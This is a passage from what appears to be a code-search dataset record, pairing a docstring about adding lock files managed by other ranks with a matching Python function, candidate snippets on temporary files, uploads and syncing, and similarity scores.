"def temporary_unsupported_image(self):\n image = Image.new('RGB', (1, 1))\n tmp_file = tempfile.NamedTemporaryFile(suffix='.ppm')\n image.save(tmp_file, 'ppm')\n # important because after save(),\n # the fp is already at the end of the file\n tmp_file.seek(0) # retrieves the created temp file\n return tmp_file",
"def copy_tmp_file(self, dst):\n if dst and self.file_exists(self.tmp_file):\n shutil.copyfile(self.tmp_file, dst)",
"def reg_file(self, file_op):\n self._context.file_handler.add_file(file_op.name,\n file_op.address, file_op.size)",
"def test_file_exists(self):\n with TemporaryDirectory() as tmp:\n # define path to file\n fp = os.path.join(tmp, \"asdf.txt\")\n\n # write atomically to file\n with atomic_write(fp, \"w\") as f:\n f.write(\"asdf\")\n\n # ensure file exists\n assert os.path.exists(fp)\n\n # ensure atomic_write to same file raises an error as it already exists\n try:\n with atomic_write(fp, \"w\") as f:\n f.write(\"asdf\")\n except FileExistsError as e:\n self.assertIsInstance(e, FileExistsError)",
"def _generate_to_tempfile(self, generator):\r\n (output_fd, output_path) = tempfile.mkstemp()\r\n with os.fdopen(output_fd, 'w') as output:\r\n generator.write(output)\r\n return output_path",
"def put_object(local_path: str, file_name: str, configuration):\n pass",
"def upload(self, remote, local, force = False):\n fl = self.list([ remote ])\n if force == False and remote in fl:\n remote_hash = fl[remote]\n h = hashlib.sha256()\n commonl.hash_file(h, local)\n if remote_hash == h.hexdigest():\n # remote hash is the same, no need to upload\n return\n\n with io.open(local, \"rb\") as inf:\n self.target.ttbd_iface_call(\"store\", \"file\", method = \"POST\",\n file_path = remote,\n files = { 'file': inf })",
"def single_file_write(self, file_pointer, filename):\n temp_file = \"resources/temp_file\"\n\n file_pointer.seek(0)\n with open(temp_file, \"wb\") as output_file:\n shutil.copyfileobj(file_pointer, output_file)\n\n os.rename(temp_file, filename)\n log.info(\"Saved file: %s\", filename)",
"def test_file_conflict(self):\n dir0, dir1 = self.make_temp_dirs(2)\n self.write_file(dir0, \"foo\")\n self.sync_all()\n\n self.write_file(dir0, \"foo\", \"bar\")\n time.sleep(0.1)\n self.write_file(dir1, \"foo\", \"baz\")\n self.sync_all()\n # File with later mtime wins\n self.assertFile(dir0, \"foo\", \"baz\")\n self.assertFile(dir1, \"foo\", \"baz\")",
"def _create_temp_files():\n\n fakes = {}\n for i in [\"domain\", \"problem\"]:\n q, fname = tempfile.mkstemp()\n os.close(q)\n fakes[i] = fname\n return fakes",
"def write_to_filepath(tmp_str, path='./temp_model111.py', create_dir=True):\n if create_dir:\n # create dir if not exists\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open(path, 'w') as f:\n f.write(tmp_str)\n f.close()",
"def temporary(cls):\n fh, path = tempfile.mkstemp(suffix='.hdf5')\n os.close(fh)\n self = cls(path, 'w')\n self.path = path\n return self",
"def overwrite_on_tape_topology(rse_factory, did_factory, root_account, vo, file_factory):\n\n rse1 = 'XRD1'\n rse1_id = rse_core.get_rse_id(rse=rse1, vo=vo)\n rse2 = 'XRD3'\n rse2_id = rse_core.get_rse_id(rse=rse2, vo=vo)\n rse3 = 'XRD4'\n rse3_id = rse_core.get_rse_id(rse=rse3, vo=vo)\n\n def __generate_and_upload_file(src_rse, dst_rse, simulate_dst_corrupted=False):\n \"\"\"\n Create and upload real files to source and destination. Don't register it on destination. This way, fts will fail if overwrite = False\n\n If simulate_dst_corrupted is True, will upload a different file to destination, to simulate that it is corrupted\n \"\"\"\n local_file = file_factory.file_generator()\n did = did_factory.random_file_did()\n did_factory.upload_test_file(src_rse, path=local_file, **did)\n did_factory.upload_client.upload(\n [\n {\n 'path': file_factory.file_generator(size=3) if simulate_dst_corrupted else local_file,\n 'rse': dst_rse,\n 'did_scope': did['scope'].external,\n 'did_name': did['name'],\n 'no_register': True,\n }\n ]\n )\n return did\n\n def __create_dids(did1_corrupted=True, did2_corrupted=True):\n \"\"\"\n Uploads two files:\n - one which requires multiple transfer hop to go to destination\n - one which can be transferred in one hop to destination rse\n \"\"\"\n # multihop transfer:\n did1 = __generate_and_upload_file(rse1, rse3, simulate_dst_corrupted=did1_corrupted)\n # direct transfer\n did2 = __generate_and_upload_file(rse2, rse3, simulate_dst_corrupted=did2_corrupted)\n rule_core.add_rule(dids=[did1, did2], account=root_account, copies=1, rse_expression=rse3, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)\n\n return rse1_id, rse2_id, rse3_id, did1, did2\n\n # Fake that destination RSE is a tape\n rse_core.update_rse(rse_id=rse3_id, parameters={'rse_type': RSEType.TAPE})\n try:\n rse_core.add_rse_attribute(rse3_id, 'archive_timeout', 60)\n yield __create_dids\n finally:\n rse_core.update_rse(rse_id=rse3_id, parameters={'rse_type': RSEType.DISK})\n rse_core.del_rse_attribute(rse3_id, 'archive_timeout')",
"def write_file(text):\n\n\ttempfile.tempdir = UPLOAD_FOLDER\n\ttemp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.txt')\n\n\ttext = text.encode('utf8')\n\n\twith open(temp_file.name, 'w') as temp:\n\t\ttemp.write(text)\n\n\tpathparts = (temp.name).split('/')\n\tpath = \"/\".join(pathparts[5:])\n\n\t#returns the temporary file path\n\treturn path",
"def create(self):\n self.file = open(self.filename, \"xb\", buffering=self.bufferSize)",
"def setup(self, tmp_path):\n create_users_file(tmp_path)\n create_jobs_file(tmp_path)",
"def copy_to_temp(object):\n temp_file = NamedTemporaryFile(delete=False)\n _copy_and_close(object, temp_file)\n return temp_file.name",
"def temporary_file_path(self):\n return self.file.name"
] | [
"0.7100669",
"0.6645065",
"0.6373811",
"0.60678446",
"0.59707797",
"0.5943573",
"0.5882913",
"0.5867154",
"0.5833076",
"0.57806534",
"0.5745454",
"0.5718152",
"0.5706169",
"0.5704879",
"0.56752044",
"0.56738895",
"0.56596625",
"0.56512666",
"0.56443375",
"0.56338364",
"0.56253743",
"0.56225497",
"0.5620132",
"0.5610537",
"0.5586419",
"0.5562855",
"0.55558413",
"0.55427134",
"0.5532904",
"0.5532109",
"0.55254203",
"0.5525001",
"0.55085677",
"0.5489739",
"0.5481336",
"0.5473111",
"0.5463623",
"0.5453448",
"0.545341",
"0.54359114",
"0.5426227",
"0.5402361",
"0.53983796",
"0.5393666",
"0.53884816",
"0.53862584",
"0.5384232",
"0.53800285",
"0.5375829",
"0.5370097",
"0.53638196",
"0.531574",
"0.5303943",
"0.5296912",
"0.52637106",
"0.5261531",
"0.5227572",
"0.52219665",
"0.52168375",
"0.52122164",
"0.52093935",
"0.5199922",
"0.5198399",
"0.51956034",
"0.5192308",
"0.5190126",
"0.5187911",
"0.5173791",
"0.5168145",
"0.5164067",
"0.51609015",
"0.5160006",
"0.5156307",
"0.5153519",
"0.51421183",
"0.5132835",
"0.51276386",
"0.51273733",
"0.51223356",
"0.51035064",
"0.508573",
"0.5084667",
"0.50846666",
"0.5080947",
"0.5078096",
"0.50762635",
"0.5072508",
"0.506375",
"0.5057118",
"0.5055892",
"0.50497925",
"0.504674",
"0.50453293",
"0.50450844",
"0.50387776",
"0.5035982",
"0.5035761",
"0.503555",
"0.50238425",
"0.502034"
] | 0.66906744 | 1 |
Add the lock files listed in lock_files to the list of lock files managed by other ranks. | def _update_lock_files(self, lock_files):
_, _lock_file, _other_lock_files = _temporary_files[
self._subarray._partition_file
]
_other_lock_files.update(set(lock_files))
if _lock_file in _other_lock_files:
# If the lock file managed by this rank is in the list of
# lock files managed by other ranks, remove it from there
_other_lock_files.remove(_lock_file) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def LockFiles(self, entries):\n self._model.lock(entries)",
"def add_mock_files(self, file_list):\n self._mock_file_list.extend(file_list)",
"def thread_file_list(self):\n # Establish connection for this thread\n connection = self.connect()\n\n # Set working directory on server\n connection.chdir(self.settings.server_dir)\n\n while len(self.files) > 0:\n self.lock.acquire()\n file = self.files.pop()\n self.lock.release()\n\n # Pass popped file to function\n try:\n self.upload_file(connection, file)\n except EOFError as error:\n self._logger.log(logging.CRITICAL, \"Connection lost during \"\n \"file transfer\")\n self._logger.log(logging.CRITICAL, str(error))\n\n # Establish connection for this thread\n connection = self.connect()\n\n # Set working directory on server\n connection.chdir(self.settings.server_dir)\n\n # Lock and append filename to list to retry\n self.lock.acquire()\n self.files.append(file)\n self.lock.release()\n\n except FileNotFoundError as error:\n self._logger.log(logging.CRITICAL, \"File \" + file + \" not \"\n \"found\")\n self._logger.log(logging.CRITICAL, str(error))\n\n except IOError:\n self.lock.acquire()\n self.files.append(file)\n self.lock.release()\n\n connection.close()",
"def get_file_list(self):\n try:\n for filename in os.listdir(SHARED_DIR):\n self.file_list.append(filename)\n except Exception as e:\n print \"Error: retriving file list, %s\" % e",
"def _distribute_files(self, distribution='one'):\n for k, files in self.file_lists.items():\n self.idle[k] = False\n if distribution.lower() == 'single':\n self.distribution_comms[k] = None\n if self.comm.rank >= 1:\n self.local_file_lists[k] = None\n self.idle[k] = True\n else:\n self.local_file_lists[k] = files\n elif distribution.lower() == 'even':\n if len(files) <= self.comm.size:\n if self.comm.rank >= len(files):\n self.local_file_lists[k] = None\n self.distribution_comms[k] = None\n self.idle[k] = True\n else:\n self.local_file_lists[k] = [files[self.comm.rank],]\n self.distribution_comms[k] = self.comm.Create(self.comm.Get_group().Incl(np.arange(len(files))))\n else:\n files_per = int(np.floor(len(files) / self.comm.size))\n excess_files = int(len(files) % self.comm.size)\n if self.comm.rank >= excess_files:\n self.local_file_lists[k] = list(files[int(self.comm.rank*files_per+excess_files):int((self.comm.rank+1)*files_per+excess_files)])\n else:\n self.local_file_lists[k] = list(files[int(self.comm.rank*(files_per+1)):int((self.comm.rank+1)*(files_per+1))])\n self.distribution_comms[k] = self.comm",
"def removeLocks():\n global lockFnames\n for lockFname in lockFnames:\n if isfile(lockFname):\n logging.debug('Removing lockfile %s' % lockFname)\n os.remove(lockFname)\n\n lockFnames = []",
"def pipfile_lock_names(self):\n return ext_split(self.pipfile_locks, \"Pipfile.lock\")",
"def add_filelist_to_cache(self, file_list=None):\n if file_list is None:\n return False\n for fileinfo in file_list:\n fn_ = fileinfo.filename\n self.cache_file_list_dict[fn_] = fileinfo\n return True",
"def add(self, files, mask):\n pass",
"def _assignUIDs(self):\n for messagePath in self.maildir:\n\n messageFile = os.path.basename(messagePath)\n\n if not messageFile in self.metadata['uids']:\n\n self.metadata['uids'][messageFile] = self.metadata['uidnext']\n\n self.metadata['uidnext'] += 1\n\n self.saveMetadata()",
"def add_mock_files_after_load(self, file_list):\n self._mock_file_list_after.extend(file_list)",
"def add_files(self, files, commit_msg):\n paths = []\n for rpath in files:\n path = os.path.join(self.repodir, rpath)\n paths.append(path)\n with open(path, 'w') as f:\n f.write(files[rpath])\n if paths:\n self.git_cmd(['add'] + paths)\n self.commit(commit_msg)",
"def lock(self):\n logging.debug(\"Locking %s (and subdirectories)\" % self.directory)\n LOCK_ACL.append(target=self.directory)\n for subdirectory in self._subdirectories():\n LOCK_ACL.append(target=subdirectory)",
"def create_files(self):\n self._do_action_under_lock(self._create_files)",
"def _save_sync_list(self):\n\t\tfp = open(self.sync_file, 'w')\n\t\tself.sync_list.write(fp)\n\t\tfp.close()",
"def _find_locked_by(self):\n fstat_flags = NTR('otherLock | otherOpen0 & headType=*+l')\n any_locked_files = {} # depot_path : user\n for branch_chunk in self.ctx.iter_writable_branch_chunks():\n # Skip any newly defined branches: they're new, won't contain any\n # files yet, and won't get a view definition until later at per-\n # commit preflight time.\n bvl = [b for b in branch_chunk if b.view_lines]\n if not bvl:\n continue\n with self.ctx.switched_to_union(bvl):\n r = self.ctx.p4run('fstat', '-F', fstat_flags, '-m1',\n '//{}/...'.format(self.ctx.p4.client),\n log_warnings=logging.DEBUG)\n # Collect a dictionary of the locked files from the writable union of branch views\n for lf in r:\n user = lf['otherOpen'][0] if 'otherOpen' in lf else NTR('<unknown>')\n any_locked_files[lf['depotFile']] = user\n return any_locked_files",
"def add_list(self, files):\n if files:\n if not list:\n self.set_list(files)\n else:\n self.playlist.extend(files)",
"def cmd_sync(self, args, list_only=False):\n if not list_only:\n log.info('synchronizing repository files...')\n for curdir, dirs, files in os.walk(self.files_path):\n for f in files:\n ignore_file = False\n repo_path = os.path.join(curdir, f).replace(self.files_path, '')\n for ignored in self.ignored_files:\n if ignored.startswith('/'):\n f = os.path.join(repo_path, f)\n if fnmatch(f, ignored):\n log.debug('ignored file ({}): {}'.format(ignored, repo_path[1:]))\n ignore_file = True\n break\n if ignore_file:\n continue\n fpath = os.path.join(curdir, f)\n linkpath = fpath.replace(self.files_path, self.homedir)\n if not os.path.exists(linkpath) and not os.path.islink(linkpath):\n log.info('synced: {}'.format(linkpath))\n if not list_only:\n log.debug('creating link: {}'.format(linkpath))\n os.symlink(fpath, linkpath)\n else:\n if os.path.islink(linkpath):\n # target path already exists\n frealpath = os.path.realpath(linkpath)\n if frealpath != fpath:\n log.warning('conflict (wrong link): {} -> {}'.format(linkpath, frealpath))\n if not list_only:\n if not args.force:\n if not log.ask_yesno('overwrite existing link?', default='n'):\n continue\n log.debug('installing link in place of existing link: {}'.format(linkpath))\n os.unlink(linkpath)\n os.symlink(fpath, linkpath)\n else:\n log.info('OK: {}'.format(linkpath))\n else: # linkpath is a regular file\n log.warning('conflict (file already exists): {}'.format(linkpath))\n if not list_only:\n if not args.force:\n if not log.ask_yesno('overwrite existing file?', default='n'):\n continue\n log.debug('installing link in place of existing file: {}'.format(linkpath))\n os.unlink(linkpath)\n os.symlink(fpath, linkpath)\n log.info('done')",
"def loadFileList(self):\r\n try:\r\n data = open(self.filelist_file, 'rb')\r\n except IOError:\r\n '''print \"No SRTM cached file list. Creating new one!\"'''\r\n if self.offline == 0:\r\n self.createFileList()\r\n return\r\n try:\r\n self.filelist = pickle.load(data)\r\n except:\r\n '''print \"Unknown error loading cached SRTM file list. Creating new one!\"'''\r\n if self.offline == 0:\r\n self.createFileList()",
"def add_files(self, filenames):\n for filename in filenames:\n self.add_file(filename)",
"def half_sync(self,delay):\n self.count = 1\n while not self.shutdown and self.loggedin.autosync:\n time.sleep(delay)\n self.count += 1\n self.filelist = self.loggedin.list()\n print \"Pinged server for changes\"\n self.synced = []\n if self.filelist:\n for f in self.filelist:\n path = self.loggedin.sanitize_path(f['path'])\n path = os.path.join(self.onedirrectory, path)\n if not os.path.exists(path):\n os.makedirs(path)\n if f['name'] and not self.loggedin.exists(f):\n exists, data = self.loggedin.getfile(f)\n if exists:\n with open(self.loggedin.make_path(f), 'a') as new_file:\n new_file.write(data)\n new_file.close()\n elif f['name'] and str(self.loggedin.hash_file(f)) != str(f['hash']):\n self.loggedin.sendfile(f['name'], f['path'])\n if self.loggedin.make_path(f) not in self.synced:\n self.synced.append(self.loggedin.make_path(f))\n os_walk = os.walk(self.loggedin.onedirrectory)\n for directory in os_walk:\n for f in directory[2]:\n if f.startswith('.'):\n continue\n path = os.path.join(directory[0], f)\n if path not in self.synced:\n try:\n os.remove(path)\n except OSError, e:\n print (\"Error: %s - %s.\" % (e.filename,e.strerror))",
"def ingest(self, files):\n for file in files:\n self.files.add(file)",
"def updateFileList(self, fileList):\n\n if fileList == self.fileList:\n return 0\n\n self.mutex.acquire()\n # init = time.time()\n # \n # while(self.bussy):\n # sleep(0.1)\n # if time.time() - init > 2*self.period:\n # return 0\n \n self.fileList = fileList\n self.mutex.release()\n return 1",
"def update_list(self):\n\t\ttry:\n\t\t\tassert(not self.master.TransactionInProgress)\n\t\t\tself.master.Vacuum()\n\n\t\t\tself.fetch_repo_file(\"/torrent\", self.config[\"daemon\"][\"rootdir\"] + \"/torrent\", \"wb\")\n\t\t\tself.master.master = json.loads(self.fetch_repo_file(\"/package-index.json\", True).decode('utf-8'))\n\t\t\tself.torrent_info = lt.torrent_info(self.config[\"daemon\"][\"rootdir\"] + \"/torrent\")\n\n\t\t\t\"\"\" Find pre-downloaded files \"\"\"\n\t\t\tpre_downloaded = {}\n\t\t\ti = 0\n\t\t\tfor f in self.torrent_info.files():\n\t\t\t\tif self.valid_tpkg_file(f.path):\n\t\t\t\t\tpre_downloaded[i] = f\n\t\t\t\ti += 1\n\n\n\t\t\t\"\"\" Default torrent params \"\"\"\n\t\t\tparams = {\n\t\t\t\t\"save_path\": self.config[\"daemon\"][\"rootdir\"],\n\t\t\t\t\"ti\": self.torrent_info\n\t\t\t}\n\t\t\t\n\t\t\t\"\"\" Set torrent handler \"\"\"\n\t\t\tself.handler = self.ses.add_torrent(params)\n\n\t\t\t\"\"\" Set chunk priority to 0 (don't download) \"\"\"\n\t\t\tfor p in range(self.torrent_info.num_pieces()):\n\t\t\t\tself.handler.piece_priority(p, 0)\n\n\t\t\tfor i in self.torrent_info.files():\n\t\t\t\tif i in pre_downloaded:\n\t\t\t\t\tpr = self.torrent_info.map_file(i, 0, pre_downloaded[i].size)\n\t\t\t\t\tn_pieces = pr.length / self.torrent_info.piece_length() + 1\n\n\t\t\t\t\tfor p in range(self.torrent_info.num_pieces()):\n\t\t\t\t\t\tif p in range(pr.piece, pr.piece + n_pieces):\n\t\t\t\t\t\t\tself.handler.piece_priority(p, 7)\n\n\t\texcept Exception as e:\n\t\t\tsys.stderr.write(\"Failed to update package list: {0}\\n\".format(e))\n\t\t\ttraceback.print_exc()\n\t\t\tself.write_line(\"Error: XXX - Failed to update package list.\")",
"def _add_files(self, index_key, media_key,\n new_list, fundamentals):\n _index=fundamentals.get(index_key, {})\n _media=fundamentals.get(media_key, {})\n for _file in new_list:\n _data=self._item_from_index(_file, 'data', _media)\n if not _data:\n self.log('Failed to write file %s due to no data'%_file)\n continue\n if self._item_from_index(_file, None, _index) is None:\n _origin=self._item_from_index(_file, 'origin', _media)\n if _origin=='ringers':\n _path=self.protocolclass.RT_PATH\n elif _origin=='sounds':\n _path=self.protocolclass.SND_PATH\n elif _origin=='images':\n _path=self.protocolclass.PIC_PATH\n else:\n selg.log('File %s has unknown origin, skip!'%_file)\n continue\n _file_name=_path+'/'+_file\n try:\n self.writefile(_file_name, _data)\n except:\n self.log('Failed to write file '+_file_name)\n if __debug__:\n raise",
"def __add_files(self, snapshot):\n\n # Why partition()?\n # Don't delete a parent after adding its child:\n # M 100644 deba01f cookbooks/apt/README\n # D cookbooks/apt <== BUG, would also delete/omit README\n\n partitioned = p4gf_util.partition(lambda x:x.is_delete(), snapshot)\n for p4file in partitioned:\n path = self.__relative_path(p4file)\n if not path:\n continue\n if path == p4gf_const.P4GF_EMPTY_CHANGELIST_PLACEHOLDER:\n # Perforce-only artifact. Never copy this into Git.\n continue\n if p4file.is_delete():\n self.__append(\"D {0}\\n\".format(path))\n else:\n if p4file.sha1 == \"\":\n LOG.debug(\"skipping missing revision {}#{}\".format(path, p4file.revision))\n continue\n if p4file.is_x_type():\n mode = \"100755\"\n elif p4file.is_symlink():\n mode = \"120000\"\n else:\n mode = \"100644\"\n self.__append(\"M {0} {1} {2}\\n\".\n format(mode, p4file.sha1, path))",
"def addFiles(self, filePaths): \n \n for filePath in filePaths: \n self.addFile(filePath)",
"def add(self,filelist):\n\n self.ws.execute('svn add %s' % (' '.join(filelist)))",
"def add_files(self,count=None):\n message_buffer =[]\n if count is None:\n count = len(self.files)\n while count:\n count -= 1\n message_buffer.append((count,base64.b64encode(self.files.pop()),0)) # required to maintain compatibility with\n if len(message_buffer) > 9:\n self.queue.write_batch(message_buffer)\n message_buffer = []\n self.queue.write_batch(message_buffer)",
"def write_manifests( file_lists, target_dir, output_dir ):\n for i, lst in enumerate( file_lists ):\n with open( os.path.join( output_dir, \"manifest-{}.txt\".format( i ) ), \"w\" ) as fout:\n for r in lst:\n fout.write( insert_rsync_marker( r, target_dir ) + \"\\n\" )",
"def sync_dir(self):\n\n # mark the trajectories that we have seen\n trajectories = os.listdir(self.trajectory_dir)\n \n for trajectory_file in trajectories:\n\n if trajectory_file not in self.seen_trajectories:\n\n created = self.upload_trajectory(trajectory_file)\n self.seen_trajectories.add(trajectory_file)\n\n if created is True:\n print \"Total of %s solved trajectories\" % \\\n SolvedTrajectory.objects.count(), created",
"def add_files(self, paths):\n for path in paths:\n self.add_file(path)",
"def update_scores_list(list_file, score_file):\n fnames = []\n head, tail = os.path.split(score_file)\n if os.path.exists(list_file):\n with open(list_file, \"r\") as f:\n fnames = json.loads(f.read())\n if tail not in fnames:\n fnames.append(tail)\n fnames.sort()\n fnames.reverse()\n else:\n fnames.append(tail)\n\n with open(list_file, \"w\") as f:\n print \"writing %s...\" % list_file\n f.write(json.dumps(fnames))",
"def _populate_index(self):\n os.makedirs(self.cache_dir, exist_ok=True)\n local_files = glob('{}/*'.format(self.cache_dir))\n for file in local_files:\n self._add_to_index(os.path.basename(file), os.path.getsize(file))",
"def test_multiple_file_locks(tmp_path, monkeypatch):\n monkeypatch.setenv(\"RAY_TMPDIR\", str(tmp_path))\n with TempFileLock(path=\"abc.txt\"):\n with TempFileLock(path=\"subdir/abc.txt\"):\n assert RAY_LOCKFILE_DIR in os.listdir(tmp_path)\n # We should have 2 locks, one for abc.txt and one for subdir/abc.txt\n assert len(os.listdir(tmp_path / RAY_LOCKFILE_DIR)) == 2",
"def get_locker_room_assgnmnt_files_list():\n files = os.listdir(lrs_path)\n files.sort(reverse=True) # Sort list newest to oldest\n return files",
"def SetLocks(self):\n\t\tthisRun = self.RunFlag\n\t\tself.CPUTempLock = FileLock(self.BuildFilePath(thisRun, \"cpu.png\"))\n\t\tself.MEMTempLock = FileLock(self.BuildFilePath(thisRun, \"mem.png\"))\n\t\tself.SWPTempLock = FileLock(self.BuildFilePath(thisRun, \"swp.png\"))\n\t\tself.LATTempLock = FileLock(self.BuildFilePath(thisRun, \"lat.png\"))\n\t\tself.LEGTempLock = FileLock(self.BuildFilePath(thisRun, \"legenda.png\"))\n\t\tself.CPUStatLock = FileLock(self.BuildFilePath(thisRun, \"cpu_stat.png\"))\n\t\tself.MEMStatLock = FileLock(self.BuildFilePath(thisRun, \"mem_stat.png\"))\n\t\tself.SWPStatLock = FileLock(self.BuildFilePath(thisRun, \"swp_stat.png\"))\n\t\tself.LATStatLock = FileLock(self.BuildFilePath(thisRun, \"lat_stat.png\"))",
"def get_hash_curr_files(self):\n temp = None\n for f in self.file_list:\n if not os.stat(f).st_size:\n self.print_to_log('Skipping Zero Length File: ' + f)\n else:\n try:\n\n batch_file = open(f,'U')\n time_stamp = self.get_timestamp()\n temp = ['pass',\n time_stamp,\n self.get_hash(batch_file),\n '1',\n time_stamp,\n batch_file.name[batch_file.name.rfind('\\\\') + 1 :]]\n\n batch_file.close()\n self.hash_curr_files[temp[2]] = temp\n self.print_to_log(\"successfully hashed file: \" + temp[5])\n except IOError:\n self.print_to_log('Cannot Open File: ' + f)\n except:\n self.print_to_log('Unknown Error, Exiting')\n raise",
"def update(self):\n if os.path.isdir(self.full_path):\n self.file_list = os.listdir(self.full_path)\n else:\n self.file_list = []",
"def append_archive_to_already_processed_list(config: Config, file_name: str) -> None:\n with open(config.already_processed, 'a') as f:\n f.write(f\"{file_name}\\n\")",
"def addfiles(self, filelist):\r\n for tmpc in filelist:\r\n self._filelist.append(tmpc)\r\n tmp_energy=self.readenergy(filelist)\r\n for tmpdat in tmp_energy:\r\n self._energy.append(tmpdat)\r\n return tmp_energy",
"def _set_locks(locks):\n _local.entry_transaction = locks",
"def copy_unmanaged_files(self, reader):\n for entry in reader.index:\n if (\n entry.path == \"l10n.toml\"\n or entry.path.startswith(\"templates/\")\n or entry.path.startswith(\"locales/\")\n ):\n continue\n\n self.index.add(entry)",
"def updateDiskFileList(self):\n\n if self.m_curPath:\n # Get me just the files please.\n for _, _, files in os.walk(self.m_curPath):\n break\n else:\n files = []\n\n files.sort()\n if files != self.m_diskNames:\n self.m_diskNames[:] = files\n self.m_newNames[:] = []\n\n self.populateFileList()",
"def _expireReadLocks(self):\n readLockFileName = ReadLock.fileName\n for name in os.listdir(self.dir):\n if not name.startswith(readLockFileName):\n continue\n LockDir = os.path.join(self.dir, name)\n ExclusiveLock(LockDir, self.readlocktimeout).expire()",
"def handleFileNames(self):\n \n # expand the wild cards - but do not create the full directory path\n # as the work sub directories have yet to be created.\n if not os.path.exists(self.shareArea):\n m = 'Cannot set self.auxfiles due to non-existent share directory: %s' % self.shareArea\n self.logger.fatal(m)\n raise RTTCodingError(m)\n\n # resolve auxFile patterns to file names\n auxFiles = []\n for pattern in self.auxFilePatterns:\n base, fnpattern = os.path.split(pattern)\n srcDir = os.path.normpath(os.path.join(self.shareArea, base))\n filesInShare = os.listdir(srcDir)\n auxFiles.extend([os.path.join(base,file) for file in filesInShare if fnmatch.fnmatch(file, fnpattern)])\n\n self.auxFiles = unique(auxFiles)",
"def _lock_all_partitions(self, shared=False):\n pass",
"def add_files(*files):\n if _files is None:\n return\n\n for file in files:\n _files.add(file)",
"def updateCache(self):\n for root, dirs, files in os.walk(cachedFilesPath):\n for file in files:\n if file.endswith(cachedFileExtensionSuffix):\n path = os.getcwd()+'/'+cachedFilesPath+file\n with open(path, mode='r') as f:\n payload_json = f.read()\n payload_obj=jsonpickle.decode(payload_json)\n r= self.upload(payload_obj)\n if isinstance(r, types.NoneType):\n #do nothing\n print(\"\")\n else:\n if r.status_code == 200 :\n #uploaded!\n if cacheArhive:\n #move it to archive\n dst=os.getcwd()+'/'+cachedArchivePath+file\n shutil.move(path, dst)\n print(\"archived log: \", file)\n else:\n #delete it\n os.remove(path)",
"def _add_paths_to_queue(self, file_paths_to_enqueue: list[str], add_at_front: bool):\n new_file_paths = list(p for p in file_paths_to_enqueue if p not in self._file_path_queue)\n if add_at_front:\n self._file_path_queue.extendleft(new_file_paths)\n else:\n self._file_path_queue.extend(new_file_paths)\n Stats.gauge(\"dag_processing.file_path_queue_size\", len(self._file_path_queue))",
"def _update_cfg_from_files(self, files):\n\t\tfor file in files:\n\t\t\twith open(self.SettingsFolder + file) as f:\n\t\t\t\tself._add_cfg_to_list(file[:-4], yaml.load(f))",
"def resortFiles(fileList):\n if fileList is None or not len(fileList):\n print \"SRT:nofiles in the dictionary.\"\n sys.exit()\n\n new_file_list = list()\n for f in fileList:\n new_file_list.append(PFileStat(dir_source, f, os.lstat(dir_source + \"/\" + f)))\n\n new_file_list.sort(key=lambda i: i.st_mtime)\n return new_file_list",
"def create_modad_lock(self):\n\n Logger.create_lock_file()\n\n with open(\"modad.lock\", \"w\") as file:\n file.write(json.dumps(self.commit_hashes))",
"def load_installed_file_list(self):\n listpath = os.path.join(self._build_root, 'src', 'gromacs', 'installed-headers.txt')\n with open(listpath, 'r') as installedfp:\n for line in installedfp:\n path = line.strip()\n if not os.path.isabs(path):\n self._reporter.input_error(\n \"installed file not specified with absolute path: {0}\"\n .format(path))\n continue\n relpath = self._get_rel_path(path)\n if relpath not in self._files:\n self._reporter.input_error(\n \"installed file not in source tree: {0}\".format(path))\n continue\n self._files[relpath].set_installed()",
"def insertfiles(self, pos, filelist):\r\n for i in range(0, len(filelist)):\r\n self._filelist.insert(pos+i, filelist[i])\r\n tmp_energy=self.readenergy(filelist)\r\n for i in range(0, len(tmp_energy)):\r\n self._energy.insert(pos+i, tmp_energy[i])\r\n return tmp_energy",
"def sync_all_lists(self):\r\n print(\"Started syncing influencer master lists with DB\")\r\n screen_names_on_lists = []\r\n self._add_or_update(screen_names_on_lists)\r\n print(\"Removing entries which are no longer on any list\")\r\n self._delete_entries_not_in_list(screen_names_on_lists) # remove entries from DB if they are on no list\r\n print(\"Sync complete\")",
"def AddInitiators(self, initiatorList):\n # Append the IQNs to the existing list\n full_iqn_list = self.initiators\n for iqn in initiatorList:\n if iqn.lower() in full_iqn_list:\n mylog.debug(iqn + \" is already in group \" + self.name)\n else:\n full_iqn_list.append(iqn)\n\n # Modify the VAG on the cluster\n params = {}\n params[\"volumeAccessGroupID\"] = self.ID\n params[\"initiators\"] = full_iqn_list\n libsf.CallApiMethod(self.mvip, self.username, self.password, \"ModifyVolumeAccessGroup\", params, ApiVersion=5.0)",
"def add(self, transfer):\n assert transfer.lock.hashlock not in self.locked\n self.locked[transfer.lock.hashlock] = transfer\n self._cached_lock_hashes.append(sha3(transfer.lock.as_bytes))\n self._cached_root = None",
"def add(args):\n files = []\n for path in args.files:\n if os.path.isdir(path):\n ft = filetree(path)\n files.extend(ft.filelist())\n else:\n files.append(path)\n for path in files:\n path = os.path.normpath(os.path.relpath(path, args.base))\n if path not in args.cache:\n args.cache.append(path)\n args.update = True\n return",
"def update_my_ownership(self, add_comp_list):\n all_transfer_event_received = []\n transfer_comp_event = self.msg.get_transfer_cmp_event()\n acc_updater_map_version = self.msg.get_acc_updater_map_version()\n self.msg.load_gl_map()\n while float_comp(acc_updater_map_version, \\\n self.msg.get_acc_updater_map_version()) >= 0:\n time.sleep(20)\n self.logger.info(\"Account updater map version is not updated old\"\\\n \"map version:%s, new map version:%s\" %(acc_updater_map_version,\\\n self.msg.get_acc_updater_map_version()))\n self.msg.load_gl_map()\n\n transfer_comp_event.set()\n self.msg.load_ownership()\n self.updated_comp_list = self.msg.get_ownershipList()\n while not self.check_ownership_updated(add_comp_list):\n time.sleep(20)\n self.msg.load_ownership()\n self.updated_comp_list = self.msg.get_ownershipList()\n\n self.logger.info(\"Updating ownership :%s\" %self.updated_comp_list)\n self.msg.set_ownershipList(self.updated_comp_list)\n\n while len(all_transfer_event_received) != 4:\n all_transfer_event_received.append(self.msg.get_from_Queue())\n transfer_comp_event.clear()\n self.logger.info(\"transfer/accept component event is cleared\")\n add_comp_list = []",
"def sync():\n for filename, requirements in _sync():\n _write_requirements(filename, requirements)",
"def add_mock_dirs(self, dir_list):\n self._mock_dir_list.extend(dir_list)",
"def whitelist_file(self, fkey):\n self.whitelist.update([fkey])",
